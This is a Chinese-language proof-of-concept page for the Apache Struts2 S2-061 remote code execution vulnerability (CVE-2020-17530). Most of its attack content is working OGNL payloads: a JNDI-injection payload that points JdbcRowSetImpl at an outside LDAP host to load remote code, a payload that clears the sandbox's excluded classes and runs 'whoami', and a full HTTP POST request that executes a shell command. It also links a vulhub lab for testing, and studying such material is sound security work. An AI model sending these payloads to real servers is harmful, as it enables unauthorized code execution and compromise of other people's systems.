# Struts2 s2-061 Poc (CVE-2020-17530)

这个洞没那么严重，其实就是s2-059绕过，大家别想多

发散思维一下，这个beanMap类似于fastjson的命令执行。所以也可以构造一个jndi注入嘛 com.sun.rowset.JdbcRowSetImpl 也存在无参构造方法 DatasourceName也可以通过beamMap去操作

```
   public void setDataSourceName(String var1) throws SQLException {
        if (this.getDataSourceName() != null) {
            if (!this.getDataSourceName().equals(var1)) {
                super.setDataSourceName(var1);
                this.conn = null;
                this.ps = null;
                this.rs = null;
            }
        } else {
            super.setDataSourceName(var1);
        }

    }
```

最后通过getAutoCommit触发jndi注入


```
  public boolean getAutoCommit() throws SQLException {
        return this.conn.getAutoCommit();
    }
```

jndi payload


```
%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#rw=#UnicodeSec.newInstance('com.sun.rowset.JdbcRowSetImpl')).(#rw.setDataSourceName('ldap://192.168.3.254:10086/UnicodeSec')).(#rw.getDatabaseMetaData())}
```

命令执行payload


```
%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'whoami'}).(#res=#exec.exec(#cmd))}
```

via：

https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

分析可以参考：

* https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247485085&idx=1&sn=f264cf31bb82ae957fb985b754890d41&chksm=f9ee6a22ce99e3349b94ef75f77e3c8dadf4ebf47a74921a547429d5180deba122f9593beefc&scene=132#wechat_redirect
* https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

VULHUB Struts2 S2-061：

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

PoC:


```
POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 848

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("echo 'forum.ywhack.com'")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
```

![](media/16096803266898/16096804259304.jpg)


![](media/16096803266898/16096804320786.jpg)


ref：

https://forum.ywhack.com/thread-114788-1-2.html